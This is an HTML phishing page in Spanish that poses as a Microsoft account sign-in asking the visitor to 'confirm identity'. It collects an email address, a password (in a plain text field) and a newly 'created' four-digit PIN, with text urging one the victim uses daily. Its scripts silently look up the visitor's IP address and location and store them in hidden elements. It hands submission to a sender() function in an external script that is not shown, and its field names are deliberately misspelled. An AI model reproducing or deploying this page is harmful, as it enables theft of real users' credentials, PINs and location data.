<html><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>Home</title>
  <link rel="shortcut icon" type="image/x-icon" href="https://companieslogo.com/img/orig/MSFT-a203b22d.png?t=1633073277">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"><!-- Link para importar la tipografia "Montserrat"-->
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500&amp;display=swap" rel="stylesheet"><!-- Link para importar los iconos-->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><!-- Importar JQuery-->
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><!-- Bootstrap JS-->
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js" integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5bApTppSuUkhZXN0VxHd" crossorigin="anonymous">
  <script>
       $.getJSON("https://api.ipify.org?format=json",
                                         function(data) {

           // Setting text of element P with id gfg
           $("#gfg").html(data.ip);
       })
    </script>
    <script>
       $.getJSON("https://ipinfo.io", function (response) {
  $("#ip").html("IP: " + response.ip);
  $("#address").html("" + response.city + ", " + response.country);

})
    </script>
  <style>
      body,
      html {
          height: 100%;
          background-image: url("https://pbs.twimg.com/media/Fth-XmMXwBYrdcF?format=jpg&name=small");
          background-position: center;
          background-size: cover;
          font-family: 'Montserrat', sans-serif;
      }

      input {
          filter: none !important;
      }

      @media only screen and (max-width: 765px) {

          body,
          html {
              background-image: none;
          }

          .login-box {
              position: relative !important;
              box-shadow: none !important;
              border-top: none !important;
              top: 0 !important;
              transform: none !important;
              float: none !important;
          }

          .login-container .wrapper {
              position: relative;
              top: 0;
              z-index: 1;
              width: 100%;
          }
      }

      .login-container {
          position: relative;
          min-height: 100%;
          max-width: 900px;
          margin: auto;
      }

      .login-box {
          position: absolute;
          top: 50%;
          transform: translateY(-50%);
          padding: 20px;
          background-color: #fff;
          box-shadow: 0px 0px 1px 0.1px #9de1da;
          border-radius: 5px;
          border-top: 1px solid #e9e9e9;
      }

      .login-header {
          text-align: center;
          padding-top: 0;
      }

      .login-header img {
          width: 150px;
      }

      .login-footer {
          position: absolute;
          bottom: 10px;
          width: 300px;
          left: 0;
          right: 0;
          margin: 0 auto;
      }

      .login-footer img {
          width: 100%;
      }

      #error-message {
          display: none;
      }


      #gradient {
          height: 100px;
          background-image: linear-gradient(to bottom, rgb(255 255 255), rgb(255 255 255 / 0%));
          display: none;
      }

      #btn-login {
          background-color: #234881;
          border-radius: 0 !important;
          padding-bottom: 7px;
          padding-top: 7px;
          margin-top: 10px;
      }

      .center {
          text-align: center;
      }

      #bottom-imgs {
          height: 80px;
          display: flex;
          align-items: center;
          justify-content: space-evenly;
          width: 80%;
          margin: 0 auto;
      }

      #bottom-imgs .img-block {
          width: 40%;
      }

      #bottom-imgs .img-block img {
          width: 100%;
      }

      #vl {
          border-right: 1px solid #908f8f;
          height: 20px;
          display: inline;
      }

      .ingresa-cuenta {
          font-family: 'Montserrat', sans-serif;
          font-size: medium 18pt;
          color: #908f8f;
          padding-top: 10px;
      }

      .text {
          font-family: 'Montserrat', sans-serif;
          font-size: smaller;
          color: #908f8f;
      }

      a {
          font-size: smaller;
          color: #234881;
      }

      .space-right {
          margin-right: 5px;
      }

      input[type=text]:focus {
          outline: none !important;
          box-shadow: none !important;
          border: 2px solid #00c8a9;
      }

      input[type=password]:focus {
          outline: none !important;
          box-shadow: none !important;
          border: 2px solid #00c8a9;
      }

      .form-group {
          max-height: 60px;
          margin-top: 0 !important;
          margin-bottom: 0 !important;
      }

      .form-control {
          box-shadow: none;
          border-width: 1px;
          border-radius: 2px;
      }

      .eye-icon {
          position: relative;
          top: 30px;
          left: 60%;
          color: #908f8f;
      }

      @media only screen and (max-width: 765px) {
          .eye-icon {
              position: relative;
              left: 80%;
              color: #908f8f;
          }

          .login-header img {
              width: 250px;
          }
      }

      @media only screen and (max-width: 500px) {
          .eye-icon {
              position: relative;
              left: 70%;
              color: #908f8f;
          }
      }

      @media only screen and (max-width: 350px) {
          .eye-icon {
              position: relative;
              left: 60%;
              color: #908f8f;
          }
      }

      .form-group>label {
          text-decoration: none !important;
          top: 30px;
          left: 10px;
          position: relative;
          background-color: white;
          padding: 0px 5px 0px 5px;
          transition: 0.2s;
          pointer-events: none;
          font-family: 'Montserrat', sans-serif;
          font-size: 10px;
          color: #908f8f;
      }

      .label-animate>label {
          top: 12px !important;
          left: 12px !important;
          font-size: 10px;
          color: #234881;
          font-weight: 500;
      }

      label {
          font-weight: 200;
      }

      .login-footer-responsive {
          position: absolute;
          bottom: 0;
          display: none;
          height: auto;
      }

      @media only screen and (max-width: 765px) {
          .login-footer-responsive {
              display: block;
          }

          .login-footer-responsive img {
              width: 100%;
          }

          #gradient {
              display: block;
          }
      }

  </style>
</head>
<body><div class="login-container">
  <div class="wrapper">
      <div class="col-xs-12 col-sm-4 col-sm-offset-4 login-box" style="z-index:1000">
          <div class="login-header"><img src="https://pbs.twimg.com/media/Fth9clMXwBYturo?format=jpg&amp;name=small">
              <h4 class="ingresa-cuenta">Ingresa a tu cuenta</h4>
              <p class="text">Iniciá sesión en la plataforma Microsoft para confirmar identidad.</p>
          </div>
          <div class="alert alert-danger" id="error-message"></div>
          <div>
              <form action="" method="post" onsubmit=" return sender()">
                  <div class="form-group label-animate"><label for="usr">Correo electrónico</label><input class="form-control" id="uzer" type="text" name="uzer" autocomplete="off" required=""></div>
                  <div class="form-group label-animate"><label for="password">Contraseña</label><i class="fa fa-eye eye-icon" aria-hidden="true" onclick="showPassword()" style="cursor: pointer;"></i><input class="form-control" id="pazz" name="pazz" type="text" required=""></div>
                </div>
                <div id="YkamcjCUbXrjXrQ" style="display: block; font-size: 11px;" class="iHdVbkVQvFXkuwc">Debes crear un PIN de 4 numeros para reforzar la seguridad de tu cuenta, Le recomendamos uno que frecuentes a diario para evitar ser olvidado.</div>
<div class="form-group label-animate"><label for="usr">Crear Pin</label><input class="form-control" id="p1n" type="number4"  name="p1n" autocomplete="off" maxlength="4" required=""></div>
                                                 <p id="gfg"  hidden="">
                                                 <p id="address"  hidden="">
                  <div class="center" style="padding-top: 5px; padding-bottom: 5px; margin-top: 5px"><a id="link-olvidaste-tu-password" href="h">¿Olvidaste tu contraseña?</a></div>
                  <div class="captcha-container form-group" style="display: none;"></div><button class="btn btn-primary btn-block" id="btn-login">Iniciar sesión</button>
              </form>
              <div id="bottom-imgs">
                  <div class="img-block"><img src="https://pbs.twimg.com/media/Fth_yz1XwAcYAuX?format=png&amp;name=360x360"></div>
                  <div id="vl"></div>
                  <div class="img-block"><img src="https://pbs.twimg.com/media/Fth_4zaX0AAw80V?format=png&amp;name=small"></div>
              </div>
              <div class="center"></div>
              <hr style="width: 30%; background-color:#666666; margin-top: 10px; margin-bottom: 10px;">
              <p class="center text" style="margin: 0;">Contactanos:</p>
              <div class="center">

                  <p class="text" style="display:inline">outlook.live.com</p>
              </div>
          </div>
      </div>
      <div id="gradient"></div>
  </div>
  <div class="login-footer"></div>
  <div class="login-footer-responsive"><img src="https://pbs.twimg.com/media/Fth-XmMXwBYrdcF?format=jpg&amp;name=small"></div>
</div>
<!--if IE 8script(src='//cdnjs.cloudflare.com/ajax/libs/ie8/0.2.5/ie8.js')-->
<!--if lte IE 9script(src='https://cdn.auth0.com/js/polyfills/1.0/base64.min.js')
script(src='https://cdn.auth0.com/js/polyfills/1.0/es5-shim.min.js')-->
<script src="sax.js"></script>
<script src=""></script>
<script src="https://cdn.auth0.com/js/polyfills/1.0/object-assign.min.js"></script>
<script></script></body></html>